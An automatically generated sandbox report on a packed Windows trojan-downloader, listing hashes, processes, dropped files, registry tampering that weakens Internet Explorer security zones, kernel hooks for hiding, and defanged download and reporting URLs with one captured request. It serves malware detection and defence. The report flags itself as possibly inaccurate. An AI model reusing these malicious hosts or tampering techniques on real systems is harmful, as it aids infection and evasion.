Gen.Variant.Graftor.181159_8a082618de

by malwarelabrobot on June 4th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Graftor.181159 (B) (Emsisoft), Gen:Variant.Graftor.181159 (AdAware), Trojan-Downloader.Win32.Karagany.1.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8a082618de41b5f732173d81d516b4ef
SHA1: 6f1557cb1910831ccfcedc375fd4fa7966fb2a13
SHA256: 8fa28f799587fc2ff38a9c8880855e39f708e4a474246a29a676ccbef028c788
SSDeep: 12288:XU9OQl4SuMC1 It8ix/TlqlB zp19bg4YStrskcaVHHrE0JoS:XUrlRP0px/TlqlB l1xfYStrfca
Size: 484864 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-03-23 18:43:45
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ndis500.exe:3740
appmon.exe:2132
MiniIE.exe:1256
ndsqp.exe:3824
audiodg.exe:2216
yum.exe:3540

The Trojan injects its code into the following process(es):

Cattle.exe:2188
%original file name%.exe:996

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ndis500.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\gYhxYl3.sys (22 bytes)
%System%\vrPCEc2 (1830 bytes)

The Trojan deletes the following file(s):

%System%\gYhxYl3.sys (0 bytes)
%WinDir%\ax01.da0 (0 bytes)
%System%\vrPCEc2 (0 bytes)

The process appmon.exe:2132 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
%Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
%Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)

The process ndsqp.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\jBkaBo6.sys (22 bytes)
%System%\yuSFHf5 (12 bytes)

The Trojan deletes the following file(s):

%System%\jBkaBo6.sys (0 bytes)
%System%\yuSFHf5 (0 bytes)

The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)

The process audiodg.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\clk.ini (103 bytes)
%WinDir%\run.bat (196 bytes)
%System%\cBLK.dll (2145 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

Registry activity

The process Cattle.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 58 62 76 4B 62 56 12 27 31 AD D2 B9 F4 41 DF"

The process ndis500.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 4B 82 8D 93 F2 BA 8D 01 58 74 8C 57 D2 E1 89"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\uOwZ216\Security]
[HKLM\System\CurrentControlSet\Services\uOwZ216]
[HKLM\System\CurrentControlSet\Services\uOwZ216\Enum]

The process appmon.exe:2132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 CD 43 1E B1 C9 B1 0B B4 F3 A3 5C 4E C7 A1 57"

The process MiniIE.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 52 03 7F 5D B2 C6 4D 32 11 88 3B 68 99 67 7B"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\KeS\MiniIE.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"

The process ndsqp.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA FA BE 37 55 0D 1D BB 16 77 C6 E2 93 24 30 39"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\xRzC549]
[HKLM\System\CurrentControlSet\Services\xRzC549\Enum]
[HKLM\System\CurrentControlSet\Services\xRzC549\Security]

The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D BF D3 46 03 3B 69 46 E3 3C 80 1C 9E 3E C3 F0"

The process audiodg.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F4 D8 59 52 8A 7F 9C 80 83 87 7B 2B D0 D7 B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"

The process yum.exe:3540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 BE 5A 31 A2 A1 21 2D C5 A3 98 9E 1C D0 CE CF"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\KeS\sys32\"

Dropped PE files

MD5 File path
8e1c47c30dba5d88699b2a1107be7e3d c:\Documents and Settings\"%CurrentUserName%"\Application Data\9JonVu.dll
01e65067a6070e8f18609886e52bef38 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WaPZAC.exe
000b3d8a037c797ed4482418c50f8a56 c:\Documents and Settings\"%CurrentUserName%"\Application Data\x6w8DF.dll
2b383b8e15eefb852d4c926a205785fe c:\Documents and Settings\"%CurrentUserName%"\Application Data\xwiR0J.dll
287e0b871129d02e71b0d376bd8bef6c c:\Documents and Settings\"%CurrentUserName%"\Application Data\yOkNJW.dll
f8eae7b3a0efaeac7e49d3bb61d34afd c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\262792\svchost.exe
cd0b75bc3eb6ca85cacce02aea253055 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\GWkgpu.nxx
4116d723ede52ee003b2a7454334453d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\svchost.exe
f6bb20d5d513f6e1e95557eb61de8324 c:\WINDOWS\KeS\MiniIE.exe
5db345ec4edd409b5cc18c6c56352360 c:\WINDOWS\KeS\sys32\urlnav.dll
6f089346e6a6a5fbbc9bfde8cab6c5d4 c:\WINDOWS\KeS\yum.exe
4540f263d05608dcd3eb0affc059bac5 c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 335872 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 339968 483328 482816 5.54469 ef47ba33313ada4919d252635d589320
UPX2 823296 4096 1024 1.77366 9b91b9a2651981ae286741309aeaab44

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.92zy.com/asb/apro.jpg 42.121.28.225
hxxp://plus.zzinfor.cn/plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 116.255.243.151
hxxp://na.b9.aicdn.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 60.18.147.37
hxxp://ln.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 60.18.147.37
hxxp://ln.p2ptool.com/txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 60.18.147.37
hxxp://ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 60.18.147.37
hxxp://ln.p2ptool.com/txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA 60.18.147.37
hxxp://na.b9.aicdn.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll
hxxp://ln.p2ptool.com/txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 60.18.147.37
hxxp://ln.p2ptool.com/txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 60.18.147.37
hxxp://na.b9.aicdn.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat
hxxp://ln.p2ptool.com/txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 60.18.147.37
hxxp://ln.p2ptool.com/txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A 60.18.147.37
hxxp://ln.p2ptool.com/txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA 60.18.147.37
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 60.18.147.37
hxxp://na.b9.aicdn.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 60.18.147.37
hxxp://na.b9.aicdn.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat
hxxp://na.b9.aicdn.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll
hxxp://na.b9.aicdn.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat
hxxp://na.b9.aicdn.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat
hxxp://na.b9.aicdn.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat
hxxp://log.app.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ 115.238.251.56
hxxp://na.b9.aicdn.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat
hxxp://prd-update.b0.upaiyun.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat 72.8.188.98
hxxp://app.log.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/
hxxp://prd-update.b0.upaiyun.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat 72.8.188.98
hxxp://prd-update.b0.upaiyun.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat 72.8.188.98
u.raidmedia.com.cn 180.150.178.245
l.raidmedia.com.cn 120.132.48.228


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

GPL WEB_CLIENT PNG large colour depth download attempt

Traffic

GET /txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 2197516
Last-Modified: Wed, 20 May 2015 05:35:34 GMT
Connection: close
ETag: "555c1d26-21880c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKibQ8n5NnLuapg1eJ6vpylpPr3dzrdXxDw/xC0 h
i48ahKqWrxewH8xxVOe3p/W0voytInO8LEpKJSqresov4P7JUR/tgBZAFWH2h8Hz/vZC73
IP xJBA3Er7TyHyYD0jE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH2q6mjxhRug0Yz4h3K0AO
lFokInOHjne8fpDJamidMpAhN2nIOvAyJtIiik9bH5OPGXJyfQNpBOtYm ARi1SoBtib4B
GLVKgG1RrlJWPxioMMcfi/GUwqfa6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI W
vvnWNUBCeri6vcqJUJDGDDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI Wv9P2tToITuQcTazQ2ZSPlrf3n4jIIw/2PE2s0NmUj5a8
TazQ2ZSPlrxNrNDZlI WvoEO8sXymTryY6XxeOXh0OjL9uMzHZHqjE2s0NmUj5azE4dSQE
6hF3aV6mEpZjZPVFNmcZPjX4jLy8pYTvxe axNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWKA
